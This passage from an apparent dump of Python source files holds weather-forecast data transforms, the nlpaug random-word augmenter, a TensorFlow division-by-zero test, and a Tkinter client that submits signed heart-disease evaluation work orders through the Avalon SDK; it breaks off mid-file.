self.sigma = sigma\n\n def __call__(self, example):\n for k in self.keys:\n x = example[k]\n example[k] += self.sigma * torch.randn_like(x)\n\n return example\n\n\nclass LongitudeRoll:\n def __init__(self):\n pass\n\n def __call__(self, example):\n obs = example[\"terciles\"]\n longitude_length = obs.sizes[\"longitude\"]\n\n roll = random.randint(0, longitude_length)\n\n rolled_example = example\n for k in example:\n if k not in [\"eccc_available\", \"ncep_available\"]:\n rolled_dataset = (\n example[k].roll(longitude=roll, roll_coords=True).drop(\"longitude\")\n )\n\n rolled_example[k] = rolled_dataset\n\n return rolled_example\n\n\nclass MembersSubsetTransform:\n def __init__(self, subset_size=1):\n self.subset_size = subset_size\n\n def __call__(self, example):\n features = example[\"features\"]\n\n n_members = features.sizes[\"realization\"]\n members = sorted(random.choices(range(n_members), k=self.subset_size))\n features = features.isel(realization=members)\n\n example[\"features\"] = features\n\n return example\n\n\nclass AddDateFeatureTransform:\n def __call__(self, example):\n features = example[\"features\"]\n date_features = np.sin(\n features.valid_time.assign_coords(variable=\"date\").dt.dayofyear / 366\n )\n new_features = xr.concat(\n [features.features, date_features], dim=\"variable\"\n ).astype(\"float32\")\n\n example[\"features\"] = new_features.to_dataset()\n\n return example\n\n\nclass VariableFilterTransform:\n def __init__(self, to_filter=None):\n self.to_filter = to_filter\n\n if to_filter is not None:\n _logger.info(\"Will filter vars: %s\", to_filter)\n\n def __call__(self, batch):\n if self.to_filter is not None:\n batch[\"features\"] = batch[\"features\"].sel(variable=self.to_filter)\n\n return batch\n\n\ndef full_transform(\n geography_file,\n weeks_12=False,\n make_distributions=False,\n random_noise_sigma=0.0,\n roll=False,\n n_members=1,\n filter_vars=None,\n biweekly_features=False,\n add_date=False,\n):\n xarray_transforms = [\n MembersSubsetTransform(n_members),\n AddLatLonFeature(),\n AddGeographyFeatures(geography_file),\n VariableFilterTransform(filter_vars),\n AddBiweeklyDimTransform(weeks_12, features=biweekly_features),\n ]\n\n if add_date:\n xarray_transforms.insert(2, AddDateFeatureTransform())\n\n if roll:\n xarray_transforms.append(LongitudeRoll())\n\n transforms = [\n *xarray_transforms,\n # LinearModelAdapter(make_distributions=make_distributions),\n AddMetadata(),\n ExampleToPytorch(),\n CubeRootTP(),\n RandomNoise(sigma=random_noise_sigma),\n ]\n return CompositeTransform(transforms)\n"} {"ext": "py", "sha": "1a306f8e75fc5c36e9eaee2fea00ba106b3d312e", "content": "\"\"\"\n Augmenter that apply random word operation to textual input.\n\"\"\"\n\nfrom nlpaug.augmenter.word import WordAugmenter\nfrom nlpaug.util import Action, Doc\n\n\nclass RandomWordAug(WordAugmenter):\n \"\"\"\n Augmenter that apply randomly behavior for augmentation.\n\n :param str action: 'substitute', 'swap', 'delete' or 'crop'. If value is 'swap', adjacent words will be swapped randomly.\n If value is 'delete', word will be removed randomly. If value is 'crop', a set of contunous word will be removed randomly.\n :param float aug_p: Percentage of word will be augmented. \n :param int aug_min: Minimum number of word will be augmented.\n :param int aug_max: Maximum number of word will be augmented. If None is passed, number of augmentation is\n calculated via aup_p. If calculated result from aug_p is smaller than aug_max, will use calculated result from\n aug_p. 
Otherwise, using aug_max.\n :param list stopwords: List of words which will be skipped from augment operation. Not effective if action is 'crop'\n :param str stopwords_regex: Regular expression for matching words which will be skipped from augment operation. Not effective if action is 'crop'\n :param list target_words: List of word for replacement (used for substitute operation only). Default value is _.\n :param func tokenizer: Customize tokenization process\n :param func reverse_tokenizer: Customize reverse of tokenization process\n :param str name: Name of this augmenter\n\n >>> import nlpaug.augmenter.word as naw\n >>> aug = naw.RandomWordAug()\n \"\"\"\n\n def __init__(self, action=Action.DELETE, name='RandomWord_Aug', aug_min=1, aug_max=10, aug_p=0.3, stopwords=None,\n target_words=None, tokenizer=None, reverse_tokenizer=None, stopwords_regex=None, \n verbose=0):\n super().__init__(\n action=action, name=name, aug_p=aug_p, aug_min=aug_min, aug_max=aug_max, stopwords=stopwords,\n tokenizer=tokenizer, reverse_tokenizer=reverse_tokenizer, device='cpu', verbose=verbose,\n stopwords_regex=stopwords_regex, include_detail=False)\n\n self.target_words = target_words or ['_']\n\n # https://arxiv.org/pdf/1711.02173.pdf, https://arxiv.org/pdf/1809.02079.pdf, https://arxiv.org/pdf/1903.09460.pdf\n def swap(self, data):\n if not data or not data.strip():\n return data\n\n change_seq = 0\n doc = Doc(data, self.tokenizer(data))\n\n aug_idxes = self._get_random_aug_idxes(doc.get_original_tokens())\n\n # https://github.com/makcedward/nlpaug/issues/76\n if aug_idxes is None or len(aug_idxes) == 0 or doc.size() < 2:\n if self.include_detail:\n return data, []\n return data\n\n for aug_idx in aug_idxes:\n swap_idx = self._get_swap_position(aug_idx, doc.size() - 1)\n change_seq += 1\n doc = self.change_case(doc, aug_idx, swap_idx, change_seq)\n\n if self.include_detail:\n return self.reverse_tokenizer(doc.get_augmented_tokens()), doc.get_change_logs()\n else:\n return self.reverse_tokenizer(doc.get_augmented_tokens())\n\n # TODO: Tune it\n def change_case(self, doc, original_word_idx, swap_word_idx, change_seq):\n original_token = doc.get_token(original_word_idx).get_latest_token().token\n swap_token = doc.get_token(swap_word_idx).get_latest_token().token\n\n if original_word_idx != 0 and swap_word_idx != 0:\n doc.add_change_log(original_word_idx, new_token=swap_token, action=Action.SWAP,\n change_seq=self.parent_change_seq+change_seq)\n doc.add_change_log(swap_word_idx, new_token=original_token, action=Action.SWAP,\n change_seq=self.parent_change_seq+change_seq)\n return doc\n\n original_token_case = self.get_word_case(original_token)\n swap_token_case = self.get_word_case(swap_token)\n\n if original_word_idx == 0:\n if original_token_case == 'capitalize' and swap_token_case == 'lower':\n doc.add_change_log(original_word_idx, new_token=swap_token.capitalize(),\n action=Action.SWAP, change_seq=self.parent_change_seq+change_seq)\n else:\n doc.add_change_log(original_word_idx, new_token=swap_token,\n action=Action.SWAP, change_seq=self.parent_change_seq+change_seq)\n if original_token_case == 'capitalize':\n doc.add_change_log(swap_word_idx, new_token=original_token.lower(),\n action=Action.SWAP, change_seq=self.parent_change_seq+change_seq)\n else:\n doc.add_change_log(swap_word_idx, new_token=original_token,\n action=Action.SWAP, change_seq=self.parent_change_seq+change_seq)\n\n if swap_word_idx == 0:\n if original_token_case == 'lower':\n doc.add_change_log(swap_word_idx, 
new_token=original_token.capitalize(),\n action=Action.SWAP, change_seq=self.parent_change_seq+change_seq)\n else:\n doc.add_change_log(swap_word_idx, new_token=original_token,\n action=Action.SWAP, change_seq=self.parent_change_seq+change_seq)\n\n if swap_token_case == 'capitalize':\n doc.add_change_log(original_word_idx, new_token=swap_token.lower(),\n action=Action.SWAP, change_seq=self.parent_change_seq+change_seq)\n else:\n doc.add_change_log(original_word_idx, new_token=swap_token,\n action=Action.SWAP, change_seq=self.parent_change_seq+change_seq)\n\n # Special case for i\n if doc.get_token(original_word_idx).get_latest_token().token == 'i':\n doc.update_change_log(original_word_idx, token='I')\n if doc.get_token(swap_word_idx).get_latest_token().token == 'i':\n doc.update_change_log(swap_word_idx, token='I')\n\n return doc\n\n def _get_swap_position(self, pos, token_length):\n if pos == 0:\n # Force swap with next character if it is first character\n return pos + 1\n elif pos == token_length:\n # Force swap with previous character if it is last character\n return pos - 1\n else:\n return pos + self.sample([-1, 1], 1)[0]\n\n # https://arxiv.org/pdf/1703.02573.pdf, https://arxiv.org/pdf/1712.06751.pdf, https://arxiv.org/pdf/1806.09030.pdf\n # https://arxiv.org/pdf/1905.11268.pdf,\n def substitute(self, data):\n if not data or not data.strip():\n return data\n\n change_seq = 0\n doc = Doc(data, self.tokenizer(data))\n\n aug_idxes = self._get_random_aug_idxes(doc.get_original_tokens())\n aug_idxes.sort(reverse=True)\n\n if aug_idxes is None or len(aug_idxes) == 0:\n if self.include_detail:\n return data, []\n return data\n\n for aug_idx in aug_idxes:\n original_token = doc.get_token(aug_idx).orig_token.token\n new_token = self.sample(self.target_words, 1)[0]\n if aug_idx == 0:\n new_token = self.align_capitalization(original_token, new_token)\n\n change_seq += 1\n doc.add_change_log(aug_idx, new_token=new_token, action=Action.SUBSTITUTE, change_seq=self.parent_change_seq+change_seq)\n\n if self.include_detail:\n return self.reverse_tokenizer(doc.get_augmented_tokens()), doc.get_change_logs()\n else:\n return self.reverse_tokenizer(doc.get_augmented_tokens())\n\n # https://arxiv.org/pdf/1905.11268.pdf, https://arxiv.org/pdf/1809.02079.pdf, https://arxiv.org/pdf/1903.09460.pdf\n def delete(self, data):\n if not data or not data.strip():\n return data\n \n change_seq = 0\n doc = Doc(data, self.tokenizer(data))\n\n aug_idxes = self._get_random_aug_idxes(doc.get_original_tokens())\n aug_idxes.sort(reverse=True)\n\n # https://github.com/makcedward/nlpaug/issues/76\n if aug_idxes is None or len(aug_idxes) == 0 or doc.size() < 2:\n if self.include_detail:\n return data, []\n return data\n\n for aug_idx in aug_idxes:\n original_token = doc.get_token(aug_idx).orig_token.token\n\n change_seq += 1\n doc.add_change_log(aug_idx, new_token='', action=Action.DELETE, change_seq=self.parent_change_seq+change_seq)\n if aug_idx == 0:\n new_token = self.align_capitalization(original_token, doc.get_token(1).orig_token.token)\n doc.add_change_log(1, new_token=new_token, action=Action.ALIGN, change_seq=self.parent_change_seq+change_seq)\n\n if self.include_detail:\n return self.reverse_tokenizer(doc.get_augmented_tokens()), doc.get_change_logs()\n else:\n return self.reverse_tokenizer(doc.get_augmented_tokens())\n\n # https://github.com/makcedward/nlpaug/issues/126\n def crop(self, data):\n if not data or not data.strip():\n return data\n\n change_seq = 1\n doc = Doc(data, self.tokenizer(data))\n\n aug_idxes 
= self._get_aug_range_idxes(doc.get_original_tokens())\n aug_idxes.sort(reverse=True)\n\n # https://github.com/makcedward/nlpaug/issues/76\n if aug_idxes is None or len(aug_idxes) == 0 or doc.size() < 2:\n if self.include_detail:\n return data, []\n return data\n\n for aug_idx in aug_idxes:\n original_token = doc.get_token(aug_idx).orig_token.token\n\n doc.add_change_log(aug_idx, new_token='', action=Action.CROP, change_seq=self.parent_change_seq+change_seq)\n if aug_idx == 0:\n new_token = self.align_capitalization(original_token, doc.get_token(1).orig_token.token)\n doc.add_change_log(1, new_token=new_token, action=Action.ALIGN, change_seq=self.parent_change_seq+change_seq)\n\n if self.include_detail:\n return self.reverse_tokenizer(doc.get_augmented_tokens()), doc.get_change_logs()\n else:\n return self.reverse_tokenizer(doc.get_augmented_tokens())\n"} {"ext": "py", "sha": "1a306ffcdb9dc4ddf95e5ed6a658059fb7050757", "content": "# Copyright 2015 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Tests for integer division by zero.\"\"\"\n\nfrom tensorflow.python.framework import constant_op\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import errors\nfrom tensorflow.python.framework import test_util\nfrom tensorflow.python.platform import test\n\n\nclass ZeroDivisionTest(test.TestCase):\n\n def testZeros(self):\n with test_util.use_gpu():\n for dtype in dtypes.uint8, dtypes.int16, dtypes.int32, dtypes.int64:\n zero = constant_op.constant(0, dtype=dtype)\n one = constant_op.constant(1, dtype=dtype)\n bads = [lambda x, y: x // y]\n if dtype in (dtypes.int32, dtypes.int64):\n bads.append(lambda x, y: x % y)\n for bad in bads:\n try:\n result = self.evaluate(bad(one, zero))\n except (errors.OpError, errors.InvalidArgumentError) as e:\n # Ideally, we'd get a nice exception. In theory, this should only\n # happen on CPU, but 32 bit integer GPU division is actually on\n # CPU due to a placer bug.\n # TODO(irving): Make stricter once the placer bug is fixed.\n self.assertIn('Integer division by zero', str(e))\n else:\n # On the GPU, integer division by zero produces all bits set.\n # But apparently on some GPUs \"all bits set\" for 64 bit division\n # means 32 bits set, so we allow 0xffffffff as well. This isn't\n # very portable, so we may need to expand this list if other GPUs\n # do different things.\n #\n # XLA constant folds integer division by zero to 1.\n self.assertTrue(test.is_gpu_available())\n self.assertIn(result, (-1, 1, 2, 0xff, 0xffffffff))\n\n\nif __name__ == '__main__':\n test.main()\n"} {"ext": "py", "sha": "1a307057e4332a646673c0910d799d5bbcafe4c8", "content": "#! 
/usr/bin/env python3\n\n# Copyright 2019 Intel Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\nHeart Evaluation GUI Client for use in submitting data to worker.\n\"\"\"\n\nimport os\nimport sys\nimport random\nimport json\nimport argparse\nimport logging\nimport secrets\n\n# Tkinter imports\nimport tkinter as tk\nimport tkinter.messagebox as messagebox\nimport tkinter.font as font\nfrom PIL import ImageTk, Image\n\n# Avalon imports\nimport crypto_utils.crypto_utility as utility\nimport avalon_sdk.worker.worker_details as worker\nfrom avalon_sdk.worker.worker_details import WorkerType\nfrom avalon_sdk.work_order.work_order_params import WorkOrderParams\nfrom avalon_sdk.direct.avalon_direct_client import AvalonDirectClient\nimport config.config as pconfig\nimport utility.logger as plogger\nimport crypto_utils.crypto.crypto as crypto\nfrom error_code.error_status import WorkOrderStatus, ReceiptCreateStatus\nimport crypto_utils.signature as signature\nfrom error_code.error_status import SignatureStatus\nfrom avalon_sdk.work_order_receipt.work_order_receipt \\\n import WorkOrderReceiptRequest\n\n# Remove duplicate loggers\nfor handler in logging.root.handlers[:]:\n logging.root.removeHandler(handler)\nlogger = logging.getLogger(__name__)\n# Default TCFHOME assumes PWD is examples/apps/heart_disease_eval/client :\nTCFHOME = os.environ.get(\"TCF_HOME\", \"../../../../\")\n\n# GUI color scheme\nBACKGROUND = \"light sky blue\"\nENTRY_COLOR = \"light grey\"\nBUTTON_COLOR = \"deep sky blue\"\nRESULT_BACKGROUND = \"pale goldenrod\"\n\n\n# -----------------------------------------------------------------\ndef _generate_random_or_normal_number(normal, percent_normal, low, high):\n \"\"\"Generate number \"normal\" for \"percent_normal\" % of the time.\n Otherwise, generate a random number in the interval [\"low\", \"high\"].\n \"\"\"\n if percent_normal >= random.randint(0, 100):\n return normal\n return random.randint(low, high)\n\n\ndef _generate_random_data():\n \"\"\"Generate a random data string for input as evaluation data.\n For example: \"35 0 1 67 102 125 1 95 0 10 1 1 3 1\"\n \"\"\"\n\n age = _generate_random_or_normal_number(35, 67, 18, 100)\n sex = _generate_random_or_normal_number(0, 50, 1, 1)\n cp = _generate_random_or_normal_number(4, 67, 1, 3)\n trestbps = _generate_random_or_normal_number(67, 67, 108, 218)\n chol = _generate_random_or_normal_number(102, 67, 126, 309)\n fbs = _generate_random_or_normal_number(125, 67, 98, 248)\n restecg = _generate_random_or_normal_number(0, 67, 1, 2)\n thalach = _generate_random_or_normal_number(95, 67, 61, 198)\n exang = _generate_random_or_normal_number(0, 67, 1, 1)\n oldpeak = _generate_random_or_normal_number(10, 67, 0, 100)\n slop = _generate_random_or_normal_number(0, 67, 1, 2)\n ca = _generate_random_or_normal_number(0, 67, 1, 3)\n thaldur = _generate_random_or_normal_number(3, 67, 6, 7)\n num = _generate_random_or_normal_number(0, 67, 1, 1)\n\n return \"{} {} {} {} {} {} {} {} {} {} {} {} {} {}\".format(\n age, sex, cp, 
trestbps, chol, fbs, restecg, thalach,\n exang, oldpeak, slop, ca, thaldur, num)\n\n\ndef _int_validate(text):\n \"\"\"Validates that input is a non-negative integer.\"\"\"\n\n if str.isdigit(text) or text == \"\":\n return True\n else:\n return False\n\n\ndef _float_validate(text):\n \"\"\"Validates that input is a non-negative, non-special float.\"\"\"\n\n if text == \"\":\n return True\n try:\n float(text)\n if float(text) < 0.0 or float(text) == float(\"NaN\") \\\n or float(text) == float(\"INF\") \\\n or float(text) == float(\"-INF\"):\n return False\n return True\n except ValueError:\n return False\n\n\nclass intEntry:\n \"\"\"User entry for non-negative integer.\"\"\"\n\n def __init__(self, master, name):\n global cur_row\n label = tk.Label(master, text=name, background=BACKGROUND)\n label.grid(row=cur_row, column=0, sticky=\"e\", pady=(5, 0))\n validate = (master.register(_int_validate))\n self.entry = tk.Entry(\n master, validate=\"all\",\n validatecommand=(validate, \"%P\"), width=5,\n background=ENTRY_COLOR)\n self.entry.grid(\n row=cur_row, column=1, padx=(10, 0), pady=(5, 0), sticky=\"w\")\n cur_row += 1\n\n def get(self):\n # Fails if empty field\n try:\n return int(self.entry.get())\n except ValueError:\n return None\n\n def enable(self):\n self.entry.config(state=tk.NORMAL)\n\n def disable(self):\n self.entry.config(state=tk.DISABLED)\n\n\nclass floatEntry:\n \"\"\"User entry for non-negative, non-special floating point number.\"\"\"\n\n def __init__(self, master, name):\n global cur_row\n label = tk.Label(master, text=name, background=BACKGROUND)\n label.grid(row=cur_row, column=0, sticky=\"e\", pady=(5,))\n validate = (master.register(_float_validate))\n self.entry = tk.Entry(\n master, validate=\"all\",\n validatecommand=(validate, \"%P\"), width=10,\n background=ENTRY_COLOR)\n self.entry.grid(row=cur_row, column=1, padx=(10, 0), pady=(5,),\n sticky=\"w\")\n cur_row += 1\n\n def get(self):\n try:\n return float(self.entry.get())\n except ValueError:\n return None\n\n def enable(self):\n self.entry.config(state=tk.NORMAL)\n\n def disable(self):\n self.entry.config(state=tk.DISABLED)\n\n\nclass radio:\n \"\"\"User entry for a radio button.\"\"\"\n\n # Options is a list of text-value pairs\n def __init__(self, master, name, options):\n global cur_row\n if not all(len(tup) == 2 for tup in options):\n print(\"ERROR: Mismatched text-value pairs\")\n exit(1)\n\n self.var = tk.IntVar()\n self.var.set(None)\n label = tk.Label(master, text=name, background=BACKGROUND)\n label.grid(row=cur_row, column=0, pady=(5, 0), sticky=\"e\")\n\n self.button_list = []\n for i in range(len(options)):\n button = tk.Radiobutton(\n master, text=options[i][0],\n variable=self.var, value=options[i][1],\n background=BACKGROUND)\n self.button_list.append(button)\n if i == 0:\n button.grid(row=cur_row, column=1, pady=(5, 0),\n sticky=\"w\")\n else:\n button.grid(row=cur_row, column=1, sticky=\"w\")\n cur_row += 1\n\n def get(self):\n try:\n return self.var.get()\n except tk.TclError:\n return None\n\n def enable(self):\n for button in self.button_list:\n button.config(state=tk.NORMAL)\n\n def disable(self):\n for button in self.button_list:\n button.config(state=tk.DISABLED)\n\n\nclass resultWindow(tk.Toplevel):\n \"\"\"Create result window that appears after clicking \"Evaluate\".\"\"\"\n\n def __init__(self, parent, message):\n tk.Toplevel.__init__(self, parent)\n self.config(background=RESULT_BACKGROUND)\n self.parent = parent\n # Lock main window\n self.transient(parent)\n self.grab_set()\n 
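# grab_set() routes all input events to this dialog, keeping it modal until\n # close() hands focus back to the parent window.\n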
self.initial_focus = self\n self.initial_focus.focus_set()\n self.title(\"Evaluation Result\")\n self.protocol(\"WM_DELETE_WINDOW\", self.close)\n\n # Main content\n self.main_frame = tk.Frame(self, background=RESULT_BACKGROUND)\n self.main_frame.pack()\n\n self.frame1 = tk.Frame(self.main_frame)\n self.frame1.pack(side=tk.LEFT)\n self.result_text = tk.StringVar()\n self.label = tk.Label(\n self.frame1, textvariable=self.result_text, width=45,\n background=RESULT_BACKGROUND)\n default_font = font.Font(font=\"TkDefaultFont\")\n new_font = default_font\n new_font.config(weight=font.BOLD)\n self.label.config(font=new_font)\n self.label.pack()\n\n # JSON window display sidebar buttons\n self.frame2 = tk.Frame(self.main_frame, background=RESULT_BACKGROUND)\n self.frame2.pack(side=tk.LEFT)\n\n self.frame2 = tk.Frame(\n self.frame2, background=RESULT_BACKGROUND)\n self.frame2.pack(side=tk.LEFT)\n\n self.request_button = tk.Button(\n self.frame2, text=\"View Request\", command=self.request,\n background=BUTTON_COLOR)\n self.request_button.pack(fill=tk.X, padx=(0, 10), pady=(10, 0))\n\n self.result_button = tk.Button(\n self.frame2, text=\"View Result\", command=self.result,\n background=BUTTON_COLOR)\n self.result_button.pack(fill=tk.X, padx=(0, 10), pady=(10, 0))\n\n self.receipt_button = tk.Button(\n self.frame2, text=\"View Receipt\",\n command=self.receipt, background=BUTTON_COLOR)\n self.receipt_button.pack(fill=tk.X, padx=(0, 10), pady=(10, 0))\n\n # Close button\n self.close_button = tk.Button(\n self, text=\"Close\",\n command=self.close, background=BUTTON_COLOR)\n self.close_button.pack(pady=(0, 5))\n\n self.evaluate(message)\n\n def evaluate(self, message):\n \"\"\"Create and submit workorder and wait for result.\"\"\"\n\n self.result_text.set(\"Waiting for evaluation result...\")\n self.update()\n\n # Create, sign, and submit workorder.\n # Convert workloadId to hex.\n workload_id = \"heart-disease-eval\"\n workload_id = workload_id.encode(\"UTF-8\").hex()\n session_iv = utility.generate_iv()\n session_key = utility.generate_key()\n requester_nonce = secrets.token_hex(16)\n work_order_id = secrets.token_hex(32)\n requester_id = secrets.token_hex(32)\n wo_params = WorkOrderParams(\n work_order_id, worker_id, workload_id, requester_id,\n session_key, session_iv, requester_nonce,\n result_uri=\" \", notify_uri=\" \",\n worker_encryption_key=worker_obj.encryption_key,\n data_encryption_algorithm=\"AES-GCM-256\"\n )\n wo_params.add_in_data(message)\n\n wo_params.add_encrypted_request_hash()\n\n private_key = utility.generate_signing_keys()\n if requester_signature:\n # Add requester signature and requester verifying_key\n if wo_params.add_requester_signature(private_key) is False:\n logger.info(\"Work order request signing failed\")\n exit(1)\n\n # Set text for JSON sidebar\n req_id = 51\n self.request_json = wo_params.to_jrpc_string(req_id)\n\n work_order_instance = direct_jrpc.get_work_order_instance()\n response = work_order_instance.work_order_submit(\n wo_params.get_work_order_id(),\n wo_params.get_worker_id(),\n wo_params.get_requester_id(),\n wo_params.to_string(),\n id=req_id\n )\n logger.info(\"Work order submit response : {}\\n \".format(\n json.dumps(response, indent=4)\n ))\n if \"error\" in response and response[\"error\"][\"code\"] != \\\n WorkOrderStatus.PENDING:\n sys.exit(1)\n # Create work order receipt\n req_id += 1\n wo_receipt_instance = direct_jrpc.get_work_order_receipt_instance()\n wo_request = json.loads(self.request_json)\n wo_receipt_obj = 
WorkOrderReceiptRequest()\n wo_create_receipt = wo_receipt_obj.create_receipt(\n wo_request,\n ReceiptCreateStatus.PENDING.value,\n private_key\n )\n logger.info(\"Work order create receipt request : {} \\n \\n \".format(\n json.dumps(wo_create_receipt, indent=4)\n ))\n # Submit work order create receipt jrpc request\n wo_receipt_resp = wo_receipt_instance.work_order_receipt_create(\n wo_create_receipt[\"workOrderId\"],\n wo_create_receipt[\"workerServiceId\"],\n wo_create_receipt[\"workerId\"],\n wo_create_receipt[\"requesterId\"],\n wo_create_receipt[\"receiptCreateStatus\"],\n wo_create_receipt[\"workOrderRequestHash\"],\n wo_create_receipt[\"requesterGeneratedNonce\"],\n wo_create_receipt[\"requesterSignature\"],\n wo_create_receipt[\"signatureRules\"],\n wo_create_receipt[\"receiptVerificationKey\"],\n req_id\n )\n\n logger.info(\"Work order create receipt response : {} \\n \\n \".format(\n wo_receipt_resp\n ))\n\n # Retrieve result and set GUI result text\n res = work_order_instance.work_order_get_result(\n work_order_id,\n req_id\n )\n self.result_json = json.dumps(res, indent=4)\n if \"result\" in res:\n sig_obj = signature.ClientSignature()\n status = sig_obj.verify_signature(\n res, worker_obj.verification_key)\n try:\n if status == SignatureStatus.PASSED:\n logger.info(\"Signature verification Successful\")\n decrypted_res = utility. \\\n decrypted_response(res, session_key, session_iv)\n logger.info(\"\\n\" +\n \"Decrypted response:\\n {}\".\n format(decrypted_res))\n else:\n logger.info(\"Signature verification Failed\")\n sys.exit(1)\n except Exception as err:\n logger.info(\"ERROR: Failed to decrypt response: %s\", str(err))\n sys.exit(1)\n else:\n logger.info(\"\\n Work order get result failed {}\\n\".format(res))\n sys.exit(1)\n\n # Set text for JSON sidebar\n self.result_text.set(\n decrypted_res[0][\"data\"])\n\n # Retrieve receipt\n # Set text for JSON sidebar\n req_id += 1\n self.receipt_json = json.dumps(\n wo_receipt_instance.work_order_receipt_retrieve(\n work_order_id,\n req_id\n ),\n indent=4\n )\n\n def request(self):\n jsonWindow(self, self.request_json, \"Request JSON\")\n\n def result(self):\n jsonWindow(self, self.result_json, \"Result JSON\")\n\n def receipt(self):\n jsonWindow(self, self.receipt_json, \"Receipt JSON\")\n\n def close(self):\n self.parent.focus_set()\n self.destroy()\n\n\nclass jsonWindow(tk.Toplevel):\n \"\"\"Template for JSON display\n (from clicking View Request/Result/Receipt buttons).\n \"\"\"\n\n def __init__(self, parent, json, title):\n tk.Toplevel.__init__(self, parent)\n self.title(title)\n self.scrollbar = tk.Scrollbar(self)\n self.scrollbar.pack(side=tk.RIGHT, fill=tk.Y)\n\n self.text = tk.Text(self, yscrollcommand=self.scrollbar.set)\n self.text.insert(tk.END, json)\n self.text.config(state=tk.DISABLED)\n self.text.pack(expand=True, fill=\"both\")\n\n self.scrollbar.config(command=self.text.yview)\n\n\ndef gui_main():\n \"\"\"Create main Tkinter window and \"Evaluate\" event handler.\"\"\"\n\n root = tk.Tk()\n root.title(\"Heart Disease Evaluation\")\n root.config(background=BACKGROUND)\n\n # Display image\n imageFile = TCFHOME + \\\n \"/examples/apps/heart_disease_eval/images/ecg.jpg\"\n img = ImageTk.PhotoImage(Image.open(imageFile))\n canvas = tk.Canvas(root, width=290, height=220, background=BACKGROUND)\n canvas.pack()\n canvas.create_image(20, 20, anchor=tk.NW, image=img)\n\n # Setup left and right frames for data entry\n var_root = tk.Frame(root, background=BACKGROUND)\n var_root.pack(pady=(10, 0))\n v_frame1 = 
tk.Frame(var_root, background=BACKGROUND)\n v_frame1.pack(fill=tk.Y, side=tk.LEFT, padx=(10, 0))\n v_frame2 = tk.Frame(var_root, background=BACKGROUND)\n v_frame2.pack(fill=tk.Y, side=tk.LEFT, padx=(0, 10))\n # Organizes parameter grid\n global cur_row\n cur_row = 0\n\n # Parameter grid\n age = intEntry(v_frame1, \"Age\")\n sex = radio(v_frame1, \"Sex\", [(\"Male\", 1), (\"Female\", 0)])\n cp = radio(v_frame1, \"Chest pain type\", [(\"Typical angina\", 1),\n (\"Atypical angina\", 2), (\"Non-anginal pain\", 3),\n (\"Asymptomatic\", 4)])\n trestbps = intEntry(v_frame1, \"Resting blood pressure\\n (mm Hg)\")\n chol = intEntry(v_frame1, \"Serum cholesterol (mg/dl)\")\n fbs = intEntry(v_frame1, \"Fasting blood sugar (mg/dl)\")\n restecg = radio(v_frame1, \"Electrocardiographic\\n resting results\",\n [(\"Normal\", 0), (\"ST-T wave abnormality\", 1),\n (\"Showing hypertrophy\", 2)])\n thalach = intEntry(v_frame1, \"Maximum heart rate\")\n exang = radio(v_frame2, \"Exercise induced angina\",\n [(\"Yes\", 1), (\"No\", 0)])\n oldpeak = floatEntry(\n v_frame2, \"ST depression induced by\\n exercise relative to rest\")\n slope = radio(v_frame2, \"Slope of the peak\\n exercise ST segment\",\n [(\"Upsloping\", 0), (\"Flat\", 1), (\"Downsloping\", 2)])\n ca = radio(v_frame2, \"Major vessels colored\\n by flouroscopy\",\n [(\"0\", 0), (\"1\", 1), (\"2\", 2), (\"3\", 3)])\n thal = radio(\n v_frame2,\n \"Thallium stress test\",\n [(\"Normal\", 3), (\"Fixed defect\", 6), (\"Reversible defect\", 7)])\n num = radio(v_frame2, \"Heart disease diagnosis\",\n [(\"<50% diameter narrowing\", 0),\n (\">50% diameter narrowing\", 1)])\n var_list = [age, sex, cp, trestbps, chol, fbs, restecg, thalach,\n exang, oldpeak, slope, ca, thal, num]\n\n def string_toggle():\n \"\"\"Disable/enable other variable entries/buttons based on\n whether string input option is selected.\n \"\"\"\n\n if string_use.get() == 1 or random_use.get() == 1:\n for var in var_list:\n var.disable()\n string_entry.config(state=tk.NORMAL)\n else:\n for var in var_list:\n var.enable()\n string_entry.config(state=tk.DISABLED)\n\n # Input vars as string option with a check button to enable\n random_frame = tk.Frame(root, background=ENTRY_COLOR)\n random_frame.pack()\n\n # Option to generate random data entry\n random_use = tk.IntVar()\n random_check = tk.Checkbutton(\n random_frame, command=string_toggle, variable=random_use,\n background=BACKGROUND)\n random_check.pack(side=tk.LEFT)\n random_label = tk.Label(\n random_frame,\n text=\"Generate random data \",\n background=BACKGROUND)\n random_label.pack(side=tk.LEFT)\n\n # Option to enter data as space-separated string entries\n string_frame = tk.Frame(root, background=ENTRY_COLOR)\n string_frame.pack()\n string_use = tk.IntVar()\n string_check = tk.Checkbutton(\n string_frame, command=string_toggle, variable=string_use,\n background=BACKGROUND)\n string_check.pack(side=tk.LEFT)\n string_label = tk.Label(\n string_frame,\n text=\"Input variables as a string\",\n background=BACKGROUND)\n string_label.pack(side=tk.LEFT)\n string_entry = tk.Entry(\n string_frame, state=tk.DISABLED, width=50,\n background=ENTRY_COLOR)\n string_entry.pack(side=tk.LEFT)\n\n def evaluate():\n \"\"\"Open window that will submit work order and retrieve\n an evaluation result.\n \"\"\"\n\n message = \"Heart disease evaluation data: \"\n if string_use.get() == 1: # input is space-separated numbers\n input_data = string_entry.get()\n if input_data is None or len(input_data) == 0:\n messagebox.showwarning(\n \"Error\", \"Must input 
